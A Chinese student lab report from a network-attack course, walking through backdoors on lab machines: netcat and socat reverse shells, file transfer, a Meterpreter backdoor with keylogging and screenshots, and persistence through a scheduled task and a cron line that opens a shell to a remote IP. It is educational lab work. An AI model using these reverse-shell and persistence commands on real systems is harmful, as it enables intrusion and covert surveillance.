20145228《网络对抗》 后门原理与实践
实验内容
•利用netcat和socat获取靶机shell,并实现任务计划启动;
•使用msf-meterpreter生成可执行后门文件获取靶机shell,并进行一些命令操作,如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装服务等
基础问题回答
1、如何启动后门?
Windows
在控制面板-管理工具-任务计划程序中添加任务,
linux中设置cron
2、如何防止被其他人安装后门程序?
防火墙和防病毒软件必须处于打开状态,定时清理垃圾软件和恶意广告,定期进行杀毒软件全盘扫描。
3、Meterpreter有哪些给你映像深刻的功能?
记录键盘输入抓取以及摄像头拍摄功能,很强的监视功能。
4、例举你能想到的一个后门进入到你系统中的可能方式?
浏览网页时,点击弹出的广告下载程序;下载软件时,自动捆绑下载了其他恶意程序。
实验过程
使用netcat获取主机操作Shell,cron启动
·首先保证虚拟机与主机之间能PING通。
·然后下载ncat与socat到windows与linux里(linux自带ncat)
(1)windows获取linux的shell
·windows开启监听端口:
·kali发起连接请求:
·Windows获得Linux的Shell
•在windows上打开cmd,并通过ncat开放端口5228
•在linux上反弹连接win:nc 192.168.184.128 5228 -e /bin/sh
(2)Linux获得Windows的Shell
•在linux下设置监听端口:nc -l -p 5228
•在windows下请求连接:ncat 192.168.184.128 5228 -e cmd.exe
•在linux下输入ipconfig查看主机IP:
ncat传输文件
•windows系统使用ncat.exe -lv 1452 > 5228.exe
监听准备接受文件
•kali系统使用ncat -nv 172.30.3.151 1452 <20145228
来发送指定文件
使用socat获取主机操作Shell
(1)kali上用socat tcp-listen:5228
把cmd绑定到端口5228
•同時用socat tcp-l:5228 system:bash,pty,stderr
反弹连接
(2)windows使用socat readline tcp:172.30.1.251 5228
开启监听
•使用ifconfig检测
meterpreter 生成后门程序
•使用msfconsole命令开启msf进行设置
•监听开始,在windows中运行之前的后门程序可以成功控制远程shell。
meterpreter信息搜集
•查看系统版本信息
•对靶机进行截图
•记录键盘输入
•安装为系统服务
设置后门自动启动
(1)Windows
•在控制面板-管理工具-任务计划程序中添加任务,编辑触发器等
(2)linux
cron启动
•kali下终端使用crontab -e
修改配置文件
在最后一行后加入* * * * * /bin/ncat 172.30.1.154 5228 -e /bin/sh
*号代表时间
实验感悟
做完这个实验后,了解到了后门程序的植入以及运行方式,使我们在以后的生活中有着防范后门的意识,具有极大的积极作用。
转载于:https://www.cnblogs.com/J000/p/6580374.html
20145228《网络对抗》 后门原理与实践相关推荐
- 20145318赵一《网络对抗》后门原理与实践
20145318赵一<网络对抗>后门原理与实践 知识点 后门 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法. 在软件的开发阶段,程序员常常会在软件内创建后门程序以便 ...
- 2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任 ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp2 后门原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp2 后门原理与实践 目录 0. 基础知识 1. 实验内容 1.0 常用后门工具 1.1 使用netcat获取主机操作S ...
- 20155317王新玮《网络对抗》Exp2 后门原理与实践
20155317王新玮<网络对抗>Exp2 后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划 ...
- 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...
- 2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作 ...
- 2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及基础问题回答 常用后门工具 netcat Win获得Linux Shell Linux获得Win Sh ...
- 20145209刘一阳《网络对抗》Exp2 后门原理与实践
20145209刘一阳<网络对抗>Exp2 后门原理与实践 基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? •在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: ...
- 2017-2018-2 20155228 《网络对抗技术》 实验二:后门原理与实践
2017-2018-2 20155228 <网络对抗技术> 实验二:后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动 (0.5分) 使用socat获取主机操作 ...
- 2018-2019-2 网络对抗技术 20165320 Exp2 后门原理与实践
后门原理与实践 windows获取Linux操作Shell 获取本机的IP netcat介绍:一个进行基本的TCP.UDP数据收发的工具 相关的参数与具体用法 windows打开监听: ncat.ex ...
最新文章
- Web安全测试检查单
- 【错误记录】记录 Android 命令行执行 Java 程序中出现的错误 ( dx 打包 PC 可执行文件报错 | dalvik 命令执行 kotlin 编译的 dex 文件报错 )
- 顺序表应用7:最大子段和之分治递归法
- POJ - 3126 - Prime Path(BFS)
- 乐高创意机器人moc_乐高MOC佳作欣赏丨机械之美机器人乐高作品集15
- 吟诗作赋不能赚钱,作诗的AI机器人的盈利之路在哪
- 手机版浏览器f12_小科普 | 如何用浏览器的F12装逼?
- 考研英语 - word-list-26
- PMP中各种图形解释和使用场景
- 香港伦敦金交易平台排行榜(2022最新版)
- python动物专家系统_动物识别专家系统 实验报告
- JS File 和 Blob 是什么
- 单片机低功耗配置及注意事项
- 时间格式Python
- N的阶乘:输入一个正整数N,输出N的阶乘
- 逆势高速增长,毫末征战三年诠释量产为王
- VC6风格转XP风格界面的两种方法
- vue router meth的2个属性: keepAlive 、deepth
- 刚入门的程序员朋友需要知道的30件事
- 2021-09-22 汽车租赁系统